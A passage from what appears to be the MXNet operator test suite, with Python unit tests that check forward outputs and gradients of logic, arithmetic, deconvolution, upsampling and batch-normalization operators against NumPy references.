y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
    out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
    # The gradient of sign() is zero almost everywhere, so the expected input
    # gradient is simply an array of zeros.
    npout_grad = np.zeros(shape)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
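# Illustrative sketch (not part of the original test suite): the identity that
# check_deconvolution_forward_backward above relies on, written with a random
# matrix C standing in for the convolution as a linear map. Deconvolution's
# forward pass applies C^T and its backward-data pass applies C, so with shared
# weights and out_grad equal to the input, the chain output C^T(Cx) equals the
# data gradient C^T(Cg).
def _sketch_conv_deconv_identity():
    import numpy as np
    rng = np.random.RandomState(0)
    C = rng.normal(size=(5, 5))          # linearized "convolution"
    x = rng.normal(size=(5,))            # input, reused as out_grad
    forward_out = C.T.dot(C.dot(x))      # input -> conv -> deconv
    data_grad = C.T.dot(C.dot(x))        # backward pass with out_grad = x
    assert np.allclose(forward_out, data_grad)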
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
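# Illustrative sketch (an aside, not part of the original helper): the factor
# root_scale**2 * scale**(2*k) asserted above comes from the backward pass of
# nearest upsampling, which sums every r x r block of the incoming gradient.
# Feeding the forward output back in as out_grad therefore returns each input
# scaled by the square of its effective upsampling factor.
def _sketch_nearest_upsampling_grad(r=2):
    import numpy as np
    x = np.arange(4.0).reshape(2, 2)
    up = np.kron(x, np.ones((r, r)))                  # nearest-neighbour upsampling
    grad = up.reshape(2, r, 2, r).sum(axis=(1, 3))    # backward pass: sum each block
    assert np.allclose(grad, x * r ** 2)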
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
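# Illustrative sketch (an aside, not from the original file): for root_scale f=2
# the bilinear weight formula used in _init_bilinear above gives the familiar
# separable 1-D kernel [0.25, 0.75, 0.75, 0.25]; the 2-D weights are its outer
# product.
def _sketch_bilinear_kernel_profile(f=2):
    import numpy as np
    c = (2 * f - 1 - f % 2) / (2.0 * f)
    size = 2 * f - f % 2
    profile = 1 - np.abs(np.arange(size) / f - c)
    if f == 2:
        assert np.allclose(profile, [0.25, 0.75, 0.75, 0.25])
    return profile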
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
            s = (shape[1],)
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
